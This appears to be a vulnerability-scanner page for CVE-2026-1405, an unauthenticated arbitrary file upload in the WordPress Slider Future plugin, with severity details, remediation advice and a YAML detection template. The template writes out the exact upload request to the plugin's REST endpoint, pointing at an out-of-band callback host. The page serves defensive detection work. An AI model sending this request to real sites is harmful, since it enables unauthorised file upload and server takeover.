WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
CVE-2026-1405
Verified
Description
Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
3%
Published Date
March 23, 2026
Template Author
pussycat0x
CVE-2026-1405.yaml
id: CVE-2026-1405
info:
name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
author: pussycat0x
severity: critical
description: |
Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
remediation: |
Update to a version later than 1.0.5 or the latest available version.
impact:
Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-1405
epss-score: 0.03177
epss-percentile: 0.8707
cwe-id: CWE-434
tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev
http:
- raw:
- |
POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"image_url":"http://{{interactsh-url}}"}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
- 'status_code == 200'
- 'contains(content_type,"application/json")'
- 'contains_all(body,"url","wp-content")'
condition: and
# digest: 4a0a0047304502205f713d5073d77c6c24dffac3d54795fc22209ae36274f9be93243b8279fffdb60221008cf41615648c7ab7e01cf1945a8e471c068184eccc5e71b5b64caa2a4d0797b5:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-1405
CWE ID:
cwe-434
References
Remediation Steps
Update to a version later than 1.0.5 or the latest available version.